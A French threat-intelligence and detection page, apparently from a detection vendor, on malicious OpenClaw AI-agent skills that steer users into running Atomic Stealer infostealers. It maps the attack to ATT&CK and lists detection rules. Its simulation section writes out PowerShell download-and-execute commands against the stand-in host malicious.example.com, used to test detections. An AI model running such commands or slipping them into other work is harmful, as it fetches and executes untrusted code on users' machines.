De l’Automatisation à l’Infection : Comment les Compétences de l’Agent IA OpenClaw Sont Armes
Suivre
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
L’article explique comment les compétences malveillantes OpenClaw sont utilisées comme un mécanisme de diffusion de logiciels malveillants pour les utilisateurs de la plateforme d’agents IA autohébergée. Les acteurs menaçants publient des compétences qui semblent inoffensives mais finissent par inciter les victimes à télécharger et exécuter des binaires contrôlés par les attaquants à partir de sources externes. Les charges utiles observées comprennent des exécutables Windows et des fichiers macOS Mach-O qui ont été identifiés comme des variantes de la famille d’infostealers Atomic Stealer. Cette activité introduit un risque pratique pour la chaîne d’approvisionnement des stations de travail personnelles et de développement qui dépendent de compétences fournies par la communauté.
Enquête
VirusTotal Code Insight a examiné plus de trois mille compétences OpenClaw et a révélé des centaines qui montraient un comportement malveillant ou à haut risque. Dans un exemple, une compétence téléchargée par hightower6eu fournissait des instructions étape par étape pour télécharger une archive ZIP protégée par mot de passe depuis GitHub (mot de passe : openclaw) et exécuter openclaw-agent.exe sur Windows. Sur macOS, la même compétence dirigeait les utilisateurs vers un script encodé en Base64 depuis glot.io, téléchargeant ensuite un exécutable Mach-O pour exécution. Les binaires résultants ont été détectés par plusieurs moteurs de sécurité comme des infostealers truffés de chevaux de Troie.
Atténuation
Considérez les dépôts de compétences comme du code non fiable et exécutez OpenClaw dans un environnement sandboxé ou fortement contraint. Évitez de coller des commandes à partir de descriptions de compétences et n’exécutez pas de binaires récupérés à partir de liens externes non vérifiés. Pour les opérateurs de marché et de communauté, implémentez une analyse en temps de publication axée sur le comportement de téléchargement à distance, la logique de script obfusqué et les indicateurs de vol d’identifiants ou d’exfiltration de données. Dans les environnements d’entreprise, éduquez les utilisateurs sur les risques associés à l’installation de compétences communautaires et exigez une révision avant utilisation.
Réponse
Recherchez les paquets de compétences OpenClaw qui référencent des URL de téléchargement externes, des archives protégées par mot de passe ou des stagers de commandes encodés. Soyez vigilant sur l’exécution de binaires inconnus nommés openclaw-agent.exe et sur les lancements Mach-O suspects qui suivent une activité de téléchargement scriptée. Bloquez la connectivité aux domaines malveillants connus et isolez les systèmes impactés pour une analyse légale afin de confirmer si une exécution d’infostealer et une exposition d’identifiants ont eu lieu.
« graph TB %% Class definitions section classDef technique fill:#99ccff classDef malware fill:#ff9999 classDef process fill:#ffcc99 %% Technique nodes tech_software_extensions[« <b>Technique</b> – T1176 extensions logicielles<br/><b>Description</b> : L’adversaire publie des extensions ou des paquets malveillants sur une place de marché pour déguiser des malwares en fonctionnalités légitimes. »] class tech_software_extensions technique tech_user_execution[« <b>Technique</b> – T1204.002 Exécution par l’utilisateur : fichier malveillant<br/><b>Description</b> : La victime est dupée pour exécuter un fichier malveillant qui télécharge et exécute des charges utiles supplémentaires. »] class tech_user_execution technique tech_embedded_payloads[« <b>Technique</b> – T1027.009 Charges utiles embarquées<br/><b>Description</b> : Le code malveillant est dissimulé dans d’autres fichiers ou scripts pour échapper à la détection. »] class tech_embedded_payloads technique tech_polymorphic_code[« <b>Technique</b> – T1027.014 Code polymorphe<br/><b>Description</b> : Le code modifie son apparence tout en conservant ses fonctionnalités pour contourner les défenses. »] class tech_polymorphic_code technique tech_decode[« <b>Technique</b> – T1140 Désobfusquer/Décoder des fichiers ou informations<br/><b>Description</b> : La victime décode ou déchiffre des charges utiles obfusquées avant l’exécution. »] class tech_decode technique tech_content_injection[« <b>Technique</b> – T1659 Injection de contenu<br/><b>Description</b> : L’adversaire injecte du contenu malveillant tel que des liens de téléchargement ou des scripts dans un flux de travail légitime. »] class tech_content_injection technique %% Malware / payload nodes malware_infostealer[« <b>Malware</b> – Trojan Infostealer<br/><b>Description</b> : Collecte des identifiants, l’historique de navigation et d’autres données sensibles du système victime. »] class malware_infostealer malware %% Process nodes proc_download_execute[« <b>Processus</b> – Télécharger et exécuter un binaire externe<br/><b>Description</b> : Les commandes récupérées à partir de la compétence téléchargent des binaires supplémentaires et les lancent. »] class proc_download_execute process proc_decode_execute[« <b>Processus</b> – Décoder et exécuter la charge utile<br/><b>Description</b> : Le script encodé en Base64 est décodé et le Trojan résultant est exécuté. »] class proc_decode_execute process %% Connections showing attack flow tech_software_extensions u002du002d>|conduit_à| tech_user_execution tech_user_execution u002du002d>|déclenche| proc_download_execute proc_download_execute u002du002d>|contient| tech_embedded_payloads proc_download_execute u002du002d>|contient| tech_polymorphic_code proc_download_execute u002du002d>|permet| tech_decode tech_decode u002du002d>|facilite| proc_decode_execute proc_decode_execute u002du002d>|exécute| malware_infostealer malware_infostealer u002du002d>|permet| tech_content_injection «
Flux d’attaque
Détections
Manipulation possible de chaînes encodées en Base64 [MacOS] (via cmdline)
Voir
Tentative d’exécution Curl suspecte [MacOS] (via cmdline)
Voir
Attributs du dossier Temp macOS Xattr ont été effacés (via process_creation)
Voir
Possible infiltration/exfiltration de données/C2 via les services/outils tiers (via proxy)
Voir
Possible infiltration/exfiltration de données/C2 via les services/outils tiers (via dns)
Voir
IOC (HashSha256) à détecter : De l’automatisation à l’infection : Comment les compétences OpenClaw AI Agent sont-elles armées
Voir
Exécution de charges utiles malveillantes via les compétences OpenClaw [Création de processus Linux]
Voir
Détection de l’exécution de l’agent OpenClaw malveillant [Création de processus Windows]
Voir
Exécution de simulation
Prérequis : la vérification préliminaire de la télémétrie et de la ligne de base doit être réussie.
Rationnel : cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et la narration DOIVENT refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection.
-
Narratif de l’attaque et commandes :
Un attaquant a obtenu un accès initial à une station de travail victime et dépose le binaire malveillantopenclaw-agent.exedans le répertoire temporaire de l’utilisateur. Le binaire est exécuté avec une ligne de commande contenant explicitement les mots-cléstéléchargerandexécuterpour récupérer des charges utiles supplémentaires depuis un serveur C2 non fiable et les exécuter en mémoire. L’attaquant utilise une invite de commande Windows standard pour éviter les détections spécifiques à PowerShell, correspondant ainsi aux attentes de la règle Sigma.- Déposer la charge utile :
$malPath = "$env:TEMPopenclaw-agent.exe" Invoke-WebRequest -Uri "http://malicious.example.com/openclaw-agent.exe" -OutFile $malPath - Exécuter avec des arguments suspects :
"%TEMP%openclaw-agent.exe" télécharger http://malicious.example.com/payload.bin exécuter - L’agent contacte le serveur C2, télécharge
payload.bin, l’écrit sur le disque, et le lance, tout en gardant la ligne de commande du processus d’origine contenant les mots déclencheurs.
- Déposer la charge utile :
-
Script de test de régression :
# ----------------------------------------------------------------------- # Simulation d'exécution de l'agent OpenClaw – déclenche la détection Sigma # ----------------------------------------------------------------------- # 1. Téléchargez l'agent malveillant (simulé avec un fichier inoffensif) $agentUrl = "https://github.com/microsoft/PowerShell/releases/download/v7.4.0/powershell-7.4.0-win-x64.msi" # fichier inoffensif de remplacement $agentPath = "$env:TEMPopenclaw-agent.exe" Invoke-WebRequest -Uri $agentUrl -OutFile $agentPath # 2. Exécutez l'agent avec les mots-clés attendus en ligne de commande $cmd = "`"$agentPath`" télécharger http://malicious.example.com/payload.bin exécuter" Write-Host "Exécution : $cmd" Start-Process -FilePath $agentPath -ArgumentList "télécharger http://malicious.example.com/payload.bin exécuter" -NoNewWindow -Wait # 3. Facultatif : Simulez le téléchargement de la charge utile (bouchon inoffensif) $payloadUrl = "https://raw.githubusercontent.com/EbookFoundation/free-programming-books/master/books/free-programming-books.md" $payloadPath = "$env:TEMPpayload.bin" Invoke-WebRequest -Uri $payloadUrl -OutFile $payloadPath Write-Host "Simulation complète. Vérifiez SIEM pour détection." -
Commandes de nettoyage :
# Supprimez tous les artefacts créés pendant la simulation $paths = @( "$env:TEMPopenclaw-agent.exe", "$env:TEMPpayload.bin" ) foreach ($p in $paths) { if (Test-Path $p) { Remove-Item -Path $p -Force Write-Host "Supprimé $p" } }